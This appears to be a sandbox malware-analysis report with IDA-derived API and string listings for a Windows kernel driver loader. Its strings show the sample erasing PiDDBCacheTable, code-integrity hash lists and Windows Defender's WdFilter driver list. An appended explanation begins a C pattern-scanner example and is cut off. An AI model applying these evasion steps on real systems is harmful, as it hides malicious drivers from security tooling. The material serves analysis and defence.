                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: fwritememmove
                                                                                          • String ID:
                                                                                          • API String ID: 1388854176-0
                                                                                          • Opcode ID: d0bc0cad5045deec8b08edcf7ecc2066f853a68d8101d3ed3ec60c7521b39cfd
                                                                                          • Instruction ID: 4c36f75da5fd0a09dc46fa26806b2b8b46642ade4519ad3fbfaa03a45ff46423
                                                                                          • Opcode Fuzzy Hash: d0bc0cad5045deec8b08edcf7ecc2066f853a68d8101d3ed3ec60c7521b39cfd
                                                                                          • Instruction Fuzzy Hash: A011B722B04B8185EA159F9A94517B8A760FB84FD8FAC4035EF4C47755CE3DD5528310
                                                                                          APIs
                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F50
                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF7CC411EB3,?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC419F72
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
                                                                                          • String ID:
                                                                                          • API String ID: 356833432-0
                                                                                          • Opcode ID: f0a3e077bed6b7d5e3db689f18c24d9aed0d68b6a22537dfba5207280866f1ca
                                                                                          • Instruction ID: 31a49e6b32eab21560742a0546543c63bed55695a9f75db3996a737d2810e7de
                                                                                          • Opcode Fuzzy Hash: f0a3e077bed6b7d5e3db689f18c24d9aed0d68b6a22537dfba5207280866f1ca
                                                                                          • Instruction Fuzzy Hash: DC118F32A08B81D1DB449F6AE65436D7BA4FB48F98F958035DB8D87B60CF38D46AC350
                                                                                          APIs
                                                                                          • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC411EB6
                                                                                          • ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,00000000,00007FF7CC411D97), ref: 00007FF7CC411EC4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_istream@??1?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 1470210177-0
                                                                                          • Opcode ID: a987b10daf80cc0ca51eefb8f321a5344bce280e03feb1e36749e0c1e7aed86a
                                                                                          • Instruction ID: fb1a4b93a011010e3d1f5c34685ee1f1a58575b532133d4d178e1bfa74373e51
                                                                                          • Opcode Fuzzy Hash: a987b10daf80cc0ca51eefb8f321a5344bce280e03feb1e36749e0c1e7aed86a
                                                                                          • Instruction Fuzzy Hash: E311E472605F8684DB449F29E5843A87BA5FB48F9CF94C032CA4D43365DF38D599C710
                                                                                          APIs
                                                                                          • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC414096
                                                                                          • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF7CC4140A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ostream@??1?$basic_streambuf@
                                                                                          • String ID:
                                                                                          • API String ID: 3334500376-0
                                                                                          • Opcode ID: e41750b549600594b78e506d084f51f477a90b595201979025fe288e4540104a
                                                                                          • Instruction ID: 5af2ec02ca81e6942588d5256e93481fec0cbcf812aeba1fe322d47e671f5afa
                                                                                          • Opcode Fuzzy Hash: e41750b549600594b78e506d084f51f477a90b595201979025fe288e4540104a
                                                                                          • Instruction Fuzzy Hash: 64111432B04F8694DB449F2AD5803A87BA5FB49BACF94D032CA8E43365DF39D599C710
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC4232F3
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423310
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualAlloc.KERNEL32 ref: 00007FF7CC423326
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC423341
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423362
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417F38
                                                                                            • Part of subcall function 00007FF7CC416D90: DeviceIoControl.KERNEL32 ref: 00007FF7CC416E35
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC418038
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7CC418044
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC418054
                                                                                            • Part of subcall function 00007FF7CC416E90: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F50
                                                                                            • Part of subcall function 00007FF7CC416E90: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F90
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41808F
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41810B
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41814E
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41817D
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC418970
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$Virtual$??6?$basic_ostream@_?good@ios_base@std@@ControlDeviceFreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@AllocOsfx@?$basic_ostream@_V12@V21@@Vios_base@1@memmove
                                                                                          • String ID: 0$PAGE$[!] g_KernelHashBucketList looks empty!$[+] Found In g_KernelHashBucketList: $[+] g_HashCacheLock Locked$[+] g_KernelHashBucketList Cleaned$[+] g_KernelHashBucketList Found 0x$[-] Can't Find ci.dll module address$[-] Can't Find g_HashCache relative address$[-] Can't Find g_HashCacheLock$[-] Can't Find g_KernelHashBucketList$[-] Can't lock g_HashCacheLock$[-] Failed to clear g_KernelHashBucketList entry pool!$[-] Failed to read first g_KernelHashBucketList entry!$[-] Failed to read g_KernelHashBucketList entry text len!$[-] Failed to read g_KernelHashBucketList entry text ptr!$[-] Failed to read g_KernelHashBucketList entry text!$[-] Failed to read g_KernelHashBucketList next entry ptr!$[-] Failed to read g_KernelHashBucketList next entry!$[-] Failed to release g_KernelHashBucketList lock!$[-] Failed to write g_KernelHashBucketList prev entry ptr!$ci.dll$xxx$xxx????x?xxxxxxx
                                                                                          • API String ID: 3205709563-1878664939
                                                                                          • Opcode ID: fbdcc912be7e2ace4436527d300a58b5be014fba983da166f70093ee60b76d1d
                                                                                          • Instruction ID: 7f5c02f16008f18271ca8318f80fd9366c831faf940082ef11a57190d89ecde8
                                                                                          • Opcode Fuzzy Hash: fbdcc912be7e2ace4436527d300a58b5be014fba983da166f70093ee60b76d1d
                                                                                          • Instruction Fuzzy Hash: 1F627062F18B8285EB00EF61E4402EDABB1AB457ACFA09135DE9D57799DF3CD245C320
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
                                                                                            • Part of subcall function 00007FF7CC417C70: DeviceIoControl.KERNEL32 ref: 00007FF7CC417D33
                                                                                            • Part of subcall function 00007FF7CC417C70: memcmp.VCRUNTIME140 ref: 00007FF7CC417DB3
                                                                                            • Part of subcall function 00007FF7CC417C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417DF5
                                                                                            • Part of subcall function 00007FF7CC417B00: memset.VCRUNTIME140 ref: 00007FF7CC417B7F
                                                                                            • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417C28
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4173DD
                                                                                            • Part of subcall function 00007FF7CC417C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417E8A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417400
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC417450
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7CC417460
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417470
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7CC417493
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7CC4174A3
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4174B3
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417520
                                                                                            • Part of subcall function 00007FF7CC4145E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC414291
                                                                                            • Part of subcall function 00007FF7CC4170E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417204
                                                                                            • Part of subcall function 00007FF7CC4170E0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417256
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4175CB
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41765B
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC417695
                                                                                          • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC4176A1
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC4176B1
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7CC41A4B7
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC417A7A
                                                                                            • Part of subcall function 00007FF7CC416FC0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417080
                                                                                            • Part of subcall function 00007FF7CC416FC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4170C0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7CC414DF4), ref: 00007FF7CC417AC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@_$_invalid_parameter_noinfo_noreturn$ControlDeviceV21@@Vios_base@1@$?good@ios_base@std@@V01@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@memcmpmemset
                                                                                          • String ID: 0$PAGE$RtlDeleteElementGenericTableAvl$[!] Failed to find RtlDeleteElementGenericTableAvl$[+] Found Table Entry = 0x$[+] PiDDBCacheTable Cleaned$[+] PiDDBCacheTable Ptr 0x$[+] PiDDBLock Locked$[+] PiDDBLock Ptr 0x$[+] PiDDBLock found with second pattern$[-] Can't delete from PiDDBCacheTable$[-] Can't get next entry$[-] Can't get prev entry$[-] Can't lock PiDDBCacheTable$[-] Can't set next entry$[-] Can't set prev entry$[-] Not found in cache$[-] Warning PiDDBCacheTable not found$[-] Warning PiDDBLock not found$xxx????xxxxx????xxx????x????x$xxxxxx$xxxxxx????xxxxx????xxx????xxxxx????x????xx?x
                                                                                          • API String ID: 239703443-2336041386
                                                                                          • Opcode ID: 345a374fe4df50a38d8664dd4f23488d79b17e9aa302e9a2f460d2100936c4b7
                                                                                          • Instruction ID: 8776915621c5fea8ef57fa7dd8ebf10b19f234efa44f5d00cd76b3ce231486cd
                                                                                          • Opcode Fuzzy Hash: 345a374fe4df50a38d8664dd4f23488d79b17e9aa302e9a2f460d2100936c4b7
                                                                                          • Instruction Fuzzy Hash: 3C324C72E18B8295EB00EF61E8412A9BBA1BB487ACF948135DD4D53759DF3CE749C320
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC4232F3
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423310
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualAlloc.KERNEL32 ref: 00007FF7CC423326
                                                                                            • Part of subcall function 00007FF7CC4232C0: NtQuerySystemInformation.NTDLL ref: 00007FF7CC423341
                                                                                            • Part of subcall function 00007FF7CC4232C0: VirtualFree.KERNEL32 ref: 00007FF7CC423362
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4150B2
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4150E0
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415145
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC415269
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415304
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4153CB
                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC41541A
                                                                                            • Part of subcall function 00007FF7CC415E00: DeviceIoControl.KERNEL32 ref: 00007FF7CC415E9B
                                                                                          • wcsstr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC41544F
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC4154BA
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC41554A
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC4155A4
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415633
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4156D4
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415753
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4157DB
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC415863
                                                                                          • DeviceIoControl.KERNEL32 ref: 00007FF7CC4158EB
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC41592C
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000003,00000000), ref: 00007FF7CC415970
                                                                                            • Part of subcall function 00007FF7CC41AA30: GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA6F
                                                                                            • Part of subcall function 00007FF7CC41AA30: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41AA97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$ControlDevice$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$Virtual$FreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$AllocHandleModulememmovememsetwcsstr
                                                                                          • String ID: 0$PAGE$WdFilter.sys$[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod$[!] Failed to find WdFilter MpFreeDriverInfoEx$[!] Failed to find WdFilter RuntimeDriversCount$[!] Failed to find WdFilter RuntimeDriversList$[!] Failed to remove from RuntimeDriversArray$[+] Found WdFilter MpFreeDriverInfoEx with second pattern$[+] WdFilter.sys not loaded, clear skipped$[+] WdFilterDriverList Cleaned: $xx????xxx$xxx????xx$xxx?x?xx???????????x$xxx?xx?x???????????x
                                                                                          • API String ID: 3544830047-4286004192
                                                                                          • Opcode ID: a1f9855e7963576bdf95c24cd32f05eedc5230692104ab97f89fb7bbed59ddc6
                                                                                          • Instruction ID: 2fb0671df848f746e411787a5393b263c7dc042e2b9652c07df29f58b7003a08
                                                                                          • Opcode Fuzzy Hash: a1f9855e7963576bdf95c24cd32f05eedc5230692104ab97f89fb7bbed59ddc6
                                                                                          • Instruction Fuzzy Hash: 61426E72B18B8189E700EF61E4402EDBBB5EB487A8F909536DA8D17B59DF3CD245C320
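The mask strings in the String ID above (`xx????xxx`, `xxx????xx`, `xxx?x?xx???????????x`) are wildcard masks for a byte-pattern scan: `x` is a byte that must match, `?` a byte that is ignored. The sample uses them to locate WdFilter.sys internals (MpFreeDriverInfoEx, RuntimeDriversCount, RuntimeDriversList) so it can unlink its driver from Defender's runtime driver list, and its own log line "[!] DriverInfo Magic is invalid ... will not be released to prevent bsod" shows that a hit is only treated as a candidate until a sanity check passes. The following is an added example written for this report, not the sample's code: a mask-based scanner in the same `x`/`?` convention, plus the RIP-relative displacement resolution that normally follows a hit on an x64 `lea`/`mov`. The code bytes and the signature are constructed for the demonstration; the report does not list the real WdFilter signature bytes, and `find_pattern`, `resolve_rip_relative` and the `demo_*` helpers are names chosen here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed x86-64 code bytes (not taken from WdFilter.sys or the sample):
 *   0x00: 90 90                   nop; nop
 *   0x02: 48 8d 0d 09 00 00 00    lea rcx,[rip+9]   ; points at 0x12
 *   0x09: 48 8b c1                mov rax,rcx
 *   0x0c: c3                      ret
 *   0x0d: cc cc cc cc cc          int3 padding
 *   0x12: 41 42 43 44             "ABCD", the data the lea refers to */
static const uint8_t code[] = {
    0x90, 0x90,
    0x48, 0x8d, 0x0d, 0x09, 0x00, 0x00, 0x00,
    0x48, 0x8b, 0xc1,
    0xc3,
    0xcc, 0xcc, 0xcc, 0xcc, 0xcc,
    0x41, 0x42, 0x43, 0x44,
};

/* Constructed signature using one of the report's mask shapes ("xxx????xx"):
 * REX + lea opcode + ModRM are fixed, the disp32 is wildcarded, and the first
 * two bytes of the following mov anchor the tail so a stray lea elsewhere
 * does not match. */
static const uint8_t sig[]  = { 0x48, 0x8d, 0x0d, 0, 0, 0, 0, 0x48, 0x8b };
static const char    mask[] = "xxx????xx";

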